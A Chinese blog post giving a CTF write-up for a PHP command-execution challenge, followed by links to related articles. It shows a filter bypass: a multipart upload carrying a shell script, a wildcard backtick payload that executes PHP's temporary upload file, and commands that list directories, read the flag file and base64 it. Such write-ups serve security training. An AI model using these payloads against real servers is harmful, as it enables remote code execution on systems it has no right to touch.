Web 红包题第二弹

原创 已于 2026-05-27 19:46:01 修改 · 389 阅读 · 7 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
GEO检测
标签
#安全 #ctf #web安全
于 2026-05-23 16:56:09 首次发布

红包题第二弹 wp

页面源代码发现提示 ?cmd=

尝试?cmd=phpinfo(); 得到源码

很明显,这里存在命令执行漏洞,除了p以外的字母数字的过滤可以走无字母数字RCE(异或,取反,自增)

这里推荐一篇P神的文章(一些不包含数字和字母的webshell):https://www.leavesongs.com/PENETRATION/webshell-without-alphanum.html

现在$ _和各种符号被过滤,无字母数字RCE就没法完成了,依旧通过P神的学习,完善的语言通常会与操作系统交互,而反引号 ` 就是简单的执行操作命令符号,配合. file就能执行文件内的系统命令(注意是.空格file)

如  `. 1.txt` 就能让操作系统解析1.txt文件并执行文件内的系统命令

思路

参考内容

P神文章(无字母数字webshell之提高篇):https://www.leavesongs.com/PENETRATION/webshell-without-alphanum-advanced.html

大佬文章:https://blog.csdn.net/Ethan552525/article/details/118459568

构造post上传一个1.txt文件,文件内容为(#! /bin/sh    ls),同时. file执行文件内容,因为我们上传的文件会被改名保存在临时文件夹tmp中,默认文件名为/tmp/phpxxxxxx (x是任意大小写字母),文件会在请求包结束后删掉,所以需要在上传的同时. file执行

构造post体

第一步:抓包,修改请求方式

修改三个部分

1.Content-Type:声明文件上传类型

  Content- Type 有两个值:①application/x-www-form-urlencoded(默认值) :上传键值对

                                              ②multipart/form-data:上传文件
这里修改Content-Type:multipart/form-data; boundary=---------------------------10242300956292313528205888 (文件类型是文件上传)

2.boundary  标识文件开始和结束,中间是文件属性和文件内容

        boundary为边界分隔符

        文件开始标记:-----------------------------10242300956292313528205888 

        文件结束标记:-----------------------------10242300956292313528205888--

这里最下面添加

-----------------------------10242300956292313528205888 (注意:要在content-length下面空一行)
Content-Disposition: form-data; name="fileUpload"; filename="1.txt"
Content-Type: text/plain

#! /bin/sh
 
ls
-----------------------------10242300956292313528205888--

3.通配符执行文件首行url添加 /?cmd=?><?=`.+/??p/p?p??????`;

?是通配符,匹配所有字符

这里?>闭合

这里<?等价与echo,<?也等价于<?php

+号:在url中+号可以表示空格

最总构造结果:

得知当前工作目录下有index.php,我们的目标是flag

查看上级目录

没有flag,继续上级目录

再来

确定flag的位置:../../../flag.txt,接着cat ../../../flag.txt读取flag

flag:ctfshow{8a276a65-bae1-4a7e-95c6-628d636b93ca}

这里题型有两种做法,第一种是上面的wp

第二种做法,如果代码没有过滤数字:?cmd=/bin/base64 flag.txt       

通配符:?cmd=/???/????64 ????.???

/bin/base64 flag.txt    bin目录存放很多基础的系统命令,引用bin目录下的base64命令转换文件内容,并输出出来

Synergy666
关注
CTFSHOW WEB 红包第二
Ethan552525的博客
07-05 4840
目: 解: 1:F12--查看源码 发现提示:?cmd= <!-- hint:?cmd= --> 2:尝试通过url传参数cmd,随意输入cmd=aaa http://2799b166-4390-45e9-a3f4-711d2a5e64c5.challenge.ctf.show:8080/?cmd=aaa 得到: if(preg_match("/[A-Za-oq-z0-9$]+/",$cmd)){ die("cerror"); } if(pr..
CTFshow-web-红包第二
qq_68581192的博客
10-24 757
在Linux的PHP环境下面,客户端(页面)如果对服务器上传文件,会先生成一个临时文件,存放在根目录下面的tmp文件夹下面,也就是/tmp目录下面.之后再对临时文件进行处理,比如是否将其存储到本地.无论服务器是否存在一个上传文件的请求,只要我们上传了一个临时文件,就一定会在该目录下面生成临时文件,但是会在生成后立刻删除.这个临时文件有一个特征,就是以php开头,后面跟6个随机字符,比如php123abc.因此我们可以使用通配符*对该文件进行匹配.通配符对上传的文件进行匹配,tmp目录写成?
ctfshow web红包第二
2302_76724233的博客
09-05 2178
我们可以发送一个上传文件的post包,此时php会将我们上传的文件保存在临时文件夹下,默认的文件名是/tmp/phpxxxxxx,文件名最后6个字符是随机的大小写字母。但是值得一提的是,通常这些临时文件夹下的文件最后是会被删除的,所以我们不得不想办法在被删除之前执行我们上传的文件。但既然是php的命令执行漏洞,这俩应该是
CTFSHOW 红包第二 web
Je3Z的博客
07-14 1122
利用临时文件的命令执行 临时文件的命名规则 在上传存储到临时目录后,临时文件命名的规则如下: 默认为 php+4或者6位随机数字和大小写字母 php[0-9A-Za-z]{3,4,5,6} 比如 :phpXXXXXX.tmp 在windows下有tmp后缀,linux没有。 PHP上传机制 php文件上传时会先将上传的文件保存到upload_tmp_dir该配置目录下,这里为/tmp,而上传页面只负责把该文件拷贝到目标目录。也就是说不管该php页面有没有文件上传功能,我们只要上传了文件,该文件就会被上
【鸿蒙】HarmonyOS 安全:加密算法与 HUKS 密钥管理
Dengzm94
06-16 432
1.密钥永远不出 TEE:长期密钥必须通过 HUKS 管理,禁止用 cryptoFramework 生成后序列化存储2.GCM 模式 Nonce 必须随机且唯一:每次加密生成新随机 Nonce,与密文一起存储3.分段 API 处理大数据:超 64KB 数据必须用 init/update/finish 三段式4.密钥生成加幂等保护:生成前检查,避免覆盖旧密钥导致已加密数据丢失5.应用卸载清理密钥:主动调用避免残留密钥在重装后引发诡异错误核心结论。
AgentScope 2.0 源码解析-权限控制系统:从架构设计到安全实践
program哲学
06-17 206
本文系统性拆解 AgentScope 2.0 框架的权限控制子系统,涵盖权限引擎(PermissionEngine)、权限上下文(PermissionContext)、权限决策(PermissionDecision)、权限规则(PermissionRule)四大核心组件。深入分析五种权限模式(DEFAULT、ACCEPT_EDITS、EXPLORE、BYPASS、DONT_ASK)与四种决策行为(ALLOW、DENY、ASK、PASSTHROUGH)的设计原理,详解六步优先级决策流程。
AI安全系统如何识别异常访问?IP风险识别正在成为关键能力
treesforest的博客
06-16 413
目前包括IP数据云在内的IP情报服务平台,已经能够提供全球IP归属地查询、代理检测和风险识别能力,开发者可以通过API快速接入相关数据源。
AI编程的安全陷阱:10个常见的安全漏洞及防范方法
yp0to1的博客
06-16 531
2026年,很多开发者用AI生成代码,但不知道AI生成的代码有安全漏洞。原因AI训练数据的局限性:AI是在公开代码上训练的,而公开代码里也有很多安全漏洞AI不理解安全上下文:AI只知道"怎么实现功能",不知道"怎么实现安全的功能"开发者过度信任AI:很多开发者盲目接受AI生成的代码,不审查安全性我的观点AI生成的代码能跑,但不一定安全。你需要有能力审查AI生成的代码的安全性。AI编程的安全陷阱核心问AI不理解安全上下文(只知道实现功能,不知道安全)AI训练数据包含漏洞代码。
中海达携空天地水应急方案亮相广州国际应急安全
Hi_Target的博客
06-16 280
6月16日-18日,2026广州国际应急安全博览会在广交会展馆隆重举办。本届展会云集千余家参展企业,设立了应急装备、低空经济应急救援、安全防护等十五大专业展区,集中展示全球前沿应急技术装备与全链条一体化解决方案,构建“龙头引领+专精特新”的产业生态。中海达应邀携空天地水一体化智慧应急解决方案亮相,获得了参会嘉宾及行业同仁的高度关注。
安全加固:敏感数据加密存储与传输安全(57)
最新发布
Davina_yu的博客
06-22 132
针对密码、验证码等隐私数据输入场景,可通过IME Kit定制安全虚拟键盘。通过禁用预测文本、实时加密按键事件,从源头防止内存抓取和第三方输入法窃听。// 初始化加密器,用于实时加密用户的按键输入// 实际场景中需从安全存储中获取动态密钥});// 构建安全键盘视图return {keys: [],// 【关键】实时加密每个按键事件,内存中不保留明文// 【关键】禁用预测文本,防止输入法引擎缓存用户输入。
移动端登录态安全设计(3):AES-GCM + Android Keystore:Android Token 本地安全存储
Mark Wu 的博客
06-20 374
本文详细介绍了Android应用中Token的安全存储方案,强调应采用多层防护机制:使用AES-GCM算法加密Token,密钥由Android Keystore系统生成和保护,加密后的密文存储在DataStore/MMKV等本地存储中。文章解答了关键问,包括为何不直接存Token到Keystore、AES-GCM的选择原因、代码结构设计、老版本迁移策略等,并指出安全是一个整体工程,需配合HTTPS传输、日志脱敏、服务端Token失效机制等形成闭环。最终目标是实现"密文存储、密钥保护、运行时解密&
AI 安全纵深防御体系架构:从威胁建模到安全自动化的全栈防护设计
我的博客
06-15 488
核心痛点:AI 系统面临的安全威胁已经从单一的攻击向量(如 Prompt 注入)演变为覆盖模型供应链、推理服务、Agent 工具调用、数据管道的全方位攻击面。然而,绝大多数企业的 AI 安全建设仍停留在"打补丁"阶段 —— 部署一个防火墙、加一层内容过滤、做一次红队测试,缺乏系统性的纵深防御架构设计。如何从架构层面构建一套可落地、可扩展、可度量的 AI 安全纵深防御体系。适配人群。
Anthropic 可信代理实践全解析:从 Plan Mode 到多层防御,AI Agent 安全架构设计指南
2404_84649926的博客
06-22 352
Harness 层- [ ] 是否实现了 Plan Mode 或等价的策略级审批?- [ ] 是否为每个工具设置了 Allow/Ask/Block 权限?- [ ] 是否设置了 Token 预算和步骤数上限?- [ ] 系统提示是否明确鼓励"不确定就问"?工具层- [ ] 工具权限是否遵循最小化原则?- [ ] 敏感操作(写、删、发送)是否需要二次确认?- [ ] 工具描述是否清晰,避免模型误用?环境层- [ ] Agent 是否运行在隔离环境(沙箱/容器)中?
点盾云新增VR加密功能:一机一码,让VR内容分发安全可控
DolitD的博客
06-16 346
点盾云推出VR加密功能,采用一机一码机制,实现激活码与VR设备唯一绑定。内容方可后台灵活授权、召回激活码或冻结设备,全程可控。三步完成加密,有效保障VR内容分发安全,防止盗用与滥用。
SpringBoot2.x + Vue2 国密接口安全实战(SM2+SM3+SM4 企业级防篡改/防泄露/防重放)
飞鸟的博客
06-17 569
本文基于SpringBoot2.x + Vue2技术栈,严格遵循 GM/T 0002/0003/0004-2012 官方国密标准,落地 SM2+SM3+SM4 全套国产化接口安全方案。通过 AOP 无侵入切面实现敏感字段加密、整包报文加密、SM3 参数验签、Redis 防重放、时间戳校验、双向身份认证六层防护,解决传统 RSA/MD5 合规性差、安全性低的问。同时梳理开发全过程版本冲突、密文兼容、签名失败等高频踩坑问与终极解决方案
信息系统基础知识(九):信息系统安全的作用与意义详解
你好,我是黄昏回响,一个热爱分享知识与见解的博主。在这里,你会看到我对生活、阅读与成长的思考。欢迎添加我的微信号 逸飞广闻,一起交流有趣的话题,碰撞思想火花。期待与你相遇,共同拓宽认知边界,收获更多精彩!
06-22 338
我们系统学习了信息安全的基础知识——五个基本要素(机密性、完整性、可用性、可控性、可审查性)、四个安全范围(设备安全、数据安全、内容安全、行为安全)以及信息存储安全等核心概念。那些知识为我们理解“信息安全是什么”打下了基础。
超自动化安全的技术选型与架构设计指南
m0_74389308的博客
06-16 272
《超自动化安全技术选型与架构设计指南》指出,超自动化正成为企业安全运营的必备能力。面对技术选型挑战,企业需重点评估五大维度:1)集成能力,考察API、协议覆盖和UI自动化;2)编排能力,关注低代码设计、场景模板和AI辅助;3)AI融合深度,检验智能决策、预测分析和自进化能力;4)部署扩展性,评估轻量化、国产化适配和分布式架构;5)企业级特性,重视权限管理和多租户隔离。该框架为企业提供了从技术评估到架构设计的系统性决策支持。
ZIP 解压安全:Central Directory、规范化路径与 miniz 示例
编程改变世界。想做一些改变世界的产品。感谢一键三连。
06-16 327
文章摘要 ZIP解压存在严重安全隐患,如路径穿越攻击(Zip Slip)可能导致文件被解压到目标目录外或覆盖系统文件。安全解压需重点关注两点:1)利用ZIP Central Directory预先校验所有文件信息,避免解压中途失败;2)对路径进行规范化处理,统一分隔符、拒绝绝对路径和..等危险路径。此外还需设置文件数量、单文件大小和总解压大小限制以防止压缩炸攻击。miniz库示例展示了先读取目录校验、后安全解压的推荐流程,强调"先校验再解压"的核心原则。
AI网关与大模型安全防火墙
技术引领业务创新
06-17 377
AI网关与大模型安全防火墙:协作共筑AI安全防线 AI网关与LLM防火墙是AI应用架构中的两大关键组件,二者功能互补而非替代。AI网关作为"智能调度员",专注于多模型路由、负载均衡和成本优化;而LLM防火墙则扮演"安全守卫"角色,实时拦截提示词注入、数据泄露等威胁。二者的协同体现在:网关提供流量管理,防火墙实施内容审查,共同形成"管理+安全"的双重保障。实际部署中可采用一体化集成(如Traefik Hub)或专业化分离(如TrueFoundry+TrojAI)模式。选型建议根据团队规模和安全需求,从轻量级组
正规API中转站怎么判断?个人和企业如何挑选稳定又合规的AI API接口(附Dify、Cursor配置、报错排查、密钥安全全攻略)
weixin_54442559的博客
06-21 294
如果只是想把一个候选方案放进备选池,向量引擎可以理解为面向AI应用、开发工具和工作流场景的API中转与模型接入服务,适合需要OpenAI兼容接口、统一模型入口、Dify/Cursor/Chatbox/Cherry Studio接入、自建脚本调用、团队接口管理的用户评估使用。所以我现在看一个方案,第一眼不会只盯价格,而是先看四件事:能不能标准接入、能不能稳定调用、报错能不能看懂、密钥能不能管住。企业最看重的通常不是“能不能用”,而是“能不能稳、能不能查、能不能追责”。能接工具,才说明它适合实际使用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值